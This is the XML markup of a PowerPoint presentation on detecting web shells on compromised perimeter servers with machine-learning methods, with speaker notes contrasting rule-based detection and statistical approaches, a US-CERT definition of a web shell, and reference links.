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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="28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8" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="362" r:id="rId22"/>
    <p:sldId id="363" r:id="rId23"/>
    <p:sldId id="364" r:id="rId24"/>
    <p:sldId id="365" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="300" r:id="rId27"/>
    <p:sldId id="301" r:id="rId28"/>
    <p:sldId id="341" r:id="rId29"/>
    <p:sldId id="337" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="338" r:id="rId32"/>
    <p:sldId id="343" r:id="rId33"/>
    <p:sldId id="310" r:id="rId34"/>
    <p:sldId id="344" r:id="rId35"/>
    <p:sldId id="294" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="295" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="275" r:id="rId41"/>
    <p:sldId id="339" r:id="rId42"/>
    <p:sldId id="366" r:id="rId43"/>
    <p:sldId id="276" r:id="rId44"/>
    <p:sldId id="277" r:id="rId45"/>
    <p:sldId id="278" r:id="rId46"/>
    <p:sldId id="279" r:id="rId47"/>
    <p:sldId id="280" r:id="rId48"/>
    <p:sldId id="345" r:id="rId49"/>
    <p:sldId id="281" r:id="rId50"/>
    <p:sldId id="283" r:id="rId51"/>
    <p:sldId id="305" r:id="rId52"/>
    <p:sldId id="346" r:id="rId53"/>
    <p:sldId id="347" r:id="rId54"/>
    <p:sldId id="348" r:id="rId55"/>
    <p:sldId id="349" r:id="rId56"/>
    <p:sldId id="350" r:id="rId57"/>
    <p:sldId id="351" r:id="rId58"/>
    <p:sldId id="352" r:id="rId59"/>
    <p:sldId id="353" r:id="rId60"/>
    <p:sldId id="354" r:id="rId61"/>
    <p:sldId id="355" r:id="rId62"/>
    <p:sldId id="356" r:id="rId63"/>
    <p:sldId id="357" r:id="rId64"/>
    <p:sldId id="358" r:id="rId65"/>
    <p:sldId id="359" r:id="rId66"/>
    <p:sldId id="360" r:id="rId67"/>
    <p:sldId id="361"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6"/>
    <p:restoredTop sz="96421"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="167" d="100"/>
          <a:sy n="167" d="100"/>
        </p:scale>
        <p:origin x="1872" y="1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449964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781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5279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798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1355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0379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3293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6261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33209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85422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0000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="2" indent="0" algn="l" defTabSz="512763" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: shades</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of grey is a good thing.  People in security tend to think black and right -&gt; rules are brittle. </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Shades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>of grey is good: Machine Learning </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Defend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>as </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Layered security strategy</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Examples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>of where certain kindfs of behavior wont confirm to a rule.  How sequencing a bunch of small indicators and </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Evidence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>from small hetergenous:</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Black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>and white is good -&gt; you are not transacting in blackh</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Rules</a:t>
            </a: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Stastistics</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Humans</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dirty="0" smtClean="0"/>
              <a:t>Simple question I use to assess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the security posture of large enterprises hwo easy can they answer this question: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”For every network request in our network can we determine the individual process on the host that generated the request”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A066C01-18BF-6F4D-9334-C915035FD91A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="879359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Evidence from small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hetergenous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>:</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100 files -&gt; is not bad because it has not triggered the 10GB rule yet</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Peer group -&gt; never moves more than 10 files</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err="1" smtClean="0"/>
              <a:t>Vpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sesion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -&gt; comes from a small geolocation</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Weaving a whole story based on the </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Black and white is good -&gt; you are not transacting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>blackh</a:t>
            </a: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340683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6504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Evidence from small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hetergenous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>:</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100 files -&gt; is not bad because it has not triggered the 10GB rule yet</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Peer group -&gt; never moves more than 10 files</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err="1" smtClean="0"/>
              <a:t>Vpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sesion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -&gt; comes from a small geolocation</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Weaving a whole story based on the </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Black and white is good -&gt; you are not transacting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>blackh</a:t>
            </a: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51958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Evidence from small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hetergenous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>:</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100 files -&gt; is not bad because it has not triggered the 10GB rule yet</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Peer group -&gt; never moves more than 10 files</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err="1" smtClean="0"/>
              <a:t>Vpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sesion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -&gt; comes from a small geolocation</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Weaving a whole story based on the </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Black and white is good -&gt; you are not transacting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>blackh</a:t>
            </a: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1390425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Evidence from small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hetergenous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>:</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100 files -&gt; is not bad because it has not triggered the 10GB rule yet</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Peer group -&gt; never moves more than 10 files</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err="1" smtClean="0"/>
              <a:t>Vpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sesion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -&gt; comes from a small geolocation</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Weaving a whole story based on the </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Black and white is good -&gt; you are not transacting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>blackh</a:t>
            </a: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780831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Evidence from small hetergenous:</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100 files -&gt; is not bad because it has not triggered the 10GB rule yet</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Peer group -&gt; never moves more than 10 files</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Vpn sesion -&gt; comes from a small geolocation</a:t>
            </a:r>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Weaving a whole story based on the </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a:p>
            <a:pPr marL="0" marR="0" lvl="2" indent="0" algn="l" defTabSz="512763" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Black and white is good -&gt; you are not transacting in blackh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="2" indent="0" algn="l" defTabSz="512763" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">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A066C01-18BF-6F4D-9334-C915035FD91A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406445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B078F03-0197-7740-AC4D-0FEAF8A24F6F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1766427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B078F03-0197-7740-AC4D-0FEAF8A24F6F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1795072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7564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4190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39188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277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649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583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636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2161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7856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8740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1937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B078F03-0197-7740-AC4D-0FEAF8A24F6F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="814006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010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0174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55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567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858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8842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Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>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1564280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0" y="789260"/>
            <a:ext cx="9144000" cy="464789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="51426" tIns="25713" rIns="51426" bIns="25713" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="20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smtClean="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776604" y="1251901"/>
            <a:ext cx="3734142" cy="503768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="51426" tIns="25713" rIns="51426" bIns="25713">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544025" y="1251900"/>
            <a:ext cx="3939166" cy="496168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="51426" tIns="25713" rIns="51426" bIns="25713">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537433" y="1750588"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="51426" tIns="25713" rIns="51426" bIns="25713"/>
          <a:lstStyle>
            <a:lvl1pPr marL="255588" indent="-255588">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="512064" indent="-192024">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="711200" indent="-158750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char="‣"/>
              <a:defRPr sz="1500"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4779599" y="1752710"/>
            <a:ext cx="3738464" cy="2792267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="51426" tIns="25713" rIns="51426" bIns="25713"/>
          <a:lstStyle>
            <a:lvl1pPr marL="255588" indent="-255588">
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="●"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="512064" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="711200" indent="-158750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char="‣"/>
              <a:defRPr sz="150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8"/>
          </p:nvPr>
        </p:nvSpPr>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8136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1900889698"/>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dirty="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hyperlink" Target="http://zerodayinitiative.com/advisories/ZDI-13-229/" TargetMode="External"/><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itlaw.wikia.com/wiki/Defense_Science_Board" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jp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jpe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jpg"/><Relationship Id="rId3"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vimeo.com/90687936" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.1145/3058060.3058083" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shell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archnetworking.techtarget.com/definition/network-perimet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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide58.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image" Target="../media/image2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g"/><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jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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2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g"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide67.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jp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47.png"/><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sz="3600" dirty="0"/>
              <a:t>Detecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0" smtClean="0"/>
              <a:t>ebshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0" smtClean="0"/>
              <a:t>ompromised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0" smtClean="0"/>
              <a:t>erimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0" smtClean="0"/>
              <a:t>ssets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0" smtClean="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" dirty="0"/>
              <a:t>ML Algorithms</a:t>
            </a:r>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lang="en" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Rod Soto @rodsoto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Joseph Zadeh @josephzadeh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What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshell</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Shape 103" descr="c99shell1-800x585.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="930300" y="1091624"/>
            <a:ext cx="7033850" cy="3917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What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshell</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 10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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>web shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>web shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is used to pivot further to internal hosts.” US CERT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Webshells </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
